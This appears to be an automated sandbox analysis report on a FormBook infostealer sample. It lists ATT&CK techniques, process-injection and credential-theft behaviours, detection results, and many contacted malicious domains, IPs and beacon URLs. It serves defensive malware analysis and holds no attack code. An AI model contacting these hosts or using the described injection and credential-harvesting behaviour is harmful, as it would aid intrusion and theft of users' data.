                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem1
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588022 Sample: 9MZZG92yMO.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 28 www.winningpath.xyz 2->28 30 www.apptj7.xyz 2->30 32 15 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 3 other signatures 2->50 10 9MZZG92yMO.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 XBOIFKGKIWT.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 RmClient.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 XBOIFKGKIWT.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.winningpath.xyz 209.74.79.41, 49987, 49988, 49989 MULTIBAND-NEWHOPEUS United States 22->34 36 www.milp.store 194.9.94.86, 50000, 50001, 50002 LOOPIASE Sweden 22->36 38 7 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                9MZZG92yMO.exe54%VirustotalBrowse
                9MZZG92yMO.exe66%ReversingLabsWin32.Trojan.AutoitInject
                9MZZG92yMO.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://static.loopia.se/shared/logo/logo-loopia-white.svg0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-72.png0%Avira URL Cloudsafe
                http://digi-searches.com/display.cfm0%Avira URL Cloudsafe
                http://www.did-ready.info/89qa/0%Avira URL Cloudsafe
                http://digi-searches.com/Pieces.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HTjn0%Avira URL Cloudsafe
                https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw0%Avira URL Cloudsafe
                http://www.deacapalla.online/__media__/design/underconstructionnotice.php?d=deacapalla.online0%Avira URL Cloudsafe
                http://digi-searches.com/September.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3H0%Avira URL Cloudsafe
                https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking0%Avira URL Cloudsafe
                https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe0%Avira URL Cloudsafe
                http://www.deacapalla.online/sdkp/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=Q2+U6NJof87KeL/xy+i0CIZPloZmzWZffj5EOQwXnkLhXENSPXaDW5SWGBVddIYwsB7Goe8a5E1AtdXY7h1Pcmgoj2AAtURgmOzcQSlReXoBGqrKsD90xFxRspg0pw2NsQGlTC8=0%Avira URL Cloudsafe
                http://www.winningpath.xyz/4p8s/0%Avira URL Cloudsafe
                http://digi-searches.com/Ambrosia.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HT0%Avira URL Cloudsafe
                http://digi-searches.com/Cousins.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HTj0%Avira URL Cloudsafe
                https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
                https://static.loopia.se/shared/style/2022-extra-pages.css0%Avira URL Cloudsafe
                http://www.buyspeechst.shop/qzi3/?nzs0T2=ZstwWiqc2nBlehIthXm/ZN/AUPsgXrD51lhdEOCLGCvwhgyybv3tjhbgBMsRsRSNQM92qNeXuPeIY/BunbCcNNF518/3bUb+8prHuu4wGUKr0baD/E+zEK5A15FFaZBXoYSAzP4=&mLFl=BXYPt2lXBpi8Dj0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-114.png0%Avira URL Cloudsafe
                http://dodowo.shop/44mq/?nzs0T2=foyEanxfLfFujag6PZWyCDygORHT/b7ZEbPS/LApOdHxGUo0%Avira URL Cloudsafe
                https://static.loopia.se/shared/images/additional-pages-hero-shape.webp0%Avira URL Cloudsafe
                http://www.did-ready.info/89qa/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=0pCqxWaHoeLxNwZtE4rbCif976qK0EABSkz9gYzxYmn//CJHUgPOWYHQR+claPVZDeQXO3fZA6HYGFtXbggvb1fmL/sutHarBSn3QusyefFvRxXanRf+9ESPTUwnwk3mbGErQuw=0%Avira URL Cloudsafe
                http://www.Deacapalla.online0%Avira URL Cloudsafe
                http://digi-searches.com/Lucinda.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HTj0%Avira URL Cloudsafe
                https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
                http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut0%Avira URL Cloudsafe
                http://www.buyspeechst.shop/qzi3/0%Avira URL Cloudsafe
                http://www.winningpath.xyz/4p8s/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=sbo6CbF7xq9vaRi3YzuXiH7G7PCaul9K2GcB+IL1+35GAWVPgulqGeXZ6bn3jQiNs+qV6ADqYtqo2KT+0SDqdopb2qyXeoTz6pIh8vt4eZWlyhEkc4Yu1dj816xA9fmF7Yf8BYw=0%Avira URL Cloudsafe
                http://www.infovea.tech/3irn/0%Avira URL Cloudsafe
                http://www.milp.store/oqbp/0%Avira URL Cloudsafe
                http://www.milp.store/oqbp/?nzs0T2=nVdj0w1j4FwXyGo+Obq+FyeO6yYPj1Biv/jBCQDtLkRj70mDH/TDAXa41L+hW2L/B4b9RwzGZeA1aKeiLPIgFZPHXdsTU40dEdaTH5HUY4e23s7HRqJoCIa7IuMIjt9j0jZPQBo=&mLFl=BXYPt2lXBpi8Dj0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/styles/reset.css0%Avira URL Cloudsafe
                http://www.dodowo.shop/44mq/0%Avira URL Cloudsafe
                http://www.deacapalla.online/__media__/js/trademark.php?d=deacapalla.online&type=ns0%Avira URL Cloudsafe
                http://www.dodowo.shop/44mq/?nzs0T2=foyEanxfLfFujag6PZWyCDygORHT/b7ZEbPS/LApOdHxGUo+oiUz5nR/Y3bTUTystoAVEPBhAuIJq0FzLvmkL65YpPHBdFMnQ+RN4nJ4f0YiJMRNqIhlsXwKcwXCFylpIZyPQ/A=&mLFl=BXYPt2lXBpi8Dj0%Avira URL Cloudsafe
                https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                http://www.deacapalla.online/sdkp/0%Avira URL Cloudsafe
                https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                https://static.loopia.se/responsive/images/iOS-57.png0%Avira URL Cloudsafe
                https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin0%Avira URL Cloudsafe
                https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
                https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb0%Avira URL Cloudsafe
                http://www.infovea.tech0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.deacapalla.online
                		208.91.197.27
                		truetrue
                  		unknown
                  infovea.tech
                  		76.223.67.189
                  		truetrue
                    		unknown
                    www.winningpath.xyz
                    		209.74.79.41
                    		truetrue
                      		unknown
                      www.mosquitoxp.lol
                      		127.0.0.1
                      		truefalse
                        		unknown
                        www.milp.store
                        		194.9.94.86
                        		truetrue
                          		unknown
                          www.did-ready.info
                          		194.245.148.189
                          		truetrue
                            		unknown
                            zcdn.8383dns.com
                            		134.122.133.80
                            		truetrue
                              		unknown
                              www.buyspeechst.shop
                              		104.21.112.1
                              		truetrue
                                		unknown
                                dodowo.shop
                                		112.175.247.179
                                		truetrue
                                  		unknown
                                  www.clubhoodies.shop
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    www.apptj7.xyz
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.vipstargold.buzz
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.infovea.tech
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.jrcov55qgcxp5fwa.top
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.1337street.shop
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.thomet.net
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.dodowo.shop
                                                		unknown
                                                		unknownfalse
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.did-ready.info/89qa/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.winningpath.xyz/4p8s/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.deacapalla.online/sdkp/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=Q2+U6NJof87KeL/xy+i0CIZPloZmzWZffj5EOQwXnkLhXENSPXaDW5SWGBVddIYwsB7Goe8a5E1AtdXY7h1Pcmgoj2AAtURgmOzcQSlReXoBGqrKsD90xFxRspg0pw2NsQGlTC8=true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.buyspeechst.shop/qzi3/?nzs0T2=ZstwWiqc2nBlehIthXm/ZN/AUPsgXrD51lhdEOCLGCvwhgyybv3tjhbgBMsRsRSNQM92qNeXuPeIY/BunbCcNNF518/3bUb+8prHuu4wGUKr0baD/E+zEK5A15FFaZBXoYSAzP4=&mLFl=BXYPt2lXBpi8Djtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.did-ready.info/89qa/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=0pCqxWaHoeLxNwZtE4rbCif976qK0EABSkz9gYzxYmn//CJHUgPOWYHQR+claPVZDeQXO3fZA6HYGFtXbggvb1fmL/sutHarBSn3QusyefFvRxXanRf+9ESPTUwnwk3mbGErQuw=true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.buyspeechst.shop/qzi3/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.winningpath.xyz/4p8s/?mLFl=BXYPt2lXBpi8Dj&nzs0T2=sbo6CbF7xq9vaRi3YzuXiH7G7PCaul9K2GcB+IL1+35GAWVPgulqGeXZ6bn3jQiNs+qV6ADqYtqo2KT+0SDqdopb2qyXeoTz6pIh8vt4eZWlyhEkc4Yu1dj816xA9fmF7Yf8BYw=true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.infovea.tech/3irn/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.milp.store/oqbp/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.milp.store/oqbp/?nzs0T2=nVdj0w1j4FwXyGo+Obq+FyeO6yYPj1Biv/jBCQDtLkRj70mDH/TDAXa41L+hW2L/B4b9RwzGZeA1aKeiLPIgFZPHXdsTU40dEdaTH5HUY4e23s7HRqJoCIa7IuMIjt9j0jZPQBo=&mLFl=BXYPt2lXBpi8Djtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.dodowo.shop/44mq/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.deacapalla.online/sdkp/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.dodowo.shop/44mq/?nzs0T2=foyEanxfLfFujag6PZWyCDygORHT/b7ZEbPS/LApOdHxGUo+oiUz5nR/Y3bTUTystoAVEPBhAuIJq0FzLvmkL65YpPHBdFMnQ+RN4nJ4f0YiJMRNqIhlsXwKcwXCFylpIZyPQ/A=&mLFl=BXYPt2lXBpi8Djtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://duckduckgo.com/chrome_newtabRmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.deacapalla.online/__media__/design/underconstructionnotice.php?d=deacapalla.onlineRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://dts.gnpge.comXBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/ac/?q=RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://digi-searches.com/September.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://cdn.consentmanager.netRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://static.loopia.se/responsive/images/iOS-72.pngRmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingRmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://digi-searches.com/display.cfmRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://i4.cdn-image.com/__media__/pics/29590/bg1.png)RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://static.loopia.se/shared/logo/logo-loopia-white.svgRmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweRmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://joker.com/?pk_campaign=Parking&pk_kwd=textRmClient.exe, 00000006.00000002.4012231174.0000000004334000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003874000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwRmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://digi-searches.com/Pieces.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HTjnRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://digi-searches.com/Ambrosia.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HTRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkRmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            http://i4.cdn-image.com/__media__/pics/28903/search.png)RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              http://dodowo.shop/44mq/?nzs0T2=foyEanxfLfFujag6PZWyCDygORHT/b7ZEbPS/LApOdHxGUoRmClient.exe, 00000006.00000002.4012231174.0000000004010000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003550000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)RmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://static.loopia.se/shared/images/additional-pages-hero-shape.webpRmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://delivery.consentmanager.netRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://digi-searches.com/Cousins.cfm?fp=SH9lOsbS1OVVggbnC4fmwz%2BlNko4bYQgT%2BmWHKPwGfnzkaImbTvQ3HTjRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://static.loopia.se/shared/style/2022-extra-pages.cssRmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://static.loopia.se/responsive/images/iOS-114.pngRmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoRmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkRmClient.exe, 00000006.00000002.4012231174.00000000041A2000.00000004.10000000.00040000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.00000000036E2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RmClient.exe, 00000006.00000003.2794811500.0000000007758000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.Deacapalla.onlineRmClient.exe, 00000006.00000002.4012231174.0000000004658000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000006.00000002.4015250060.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, XBOIFKGKIWT.exe, 00000008.00000002.4011832886.0000000003B98000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
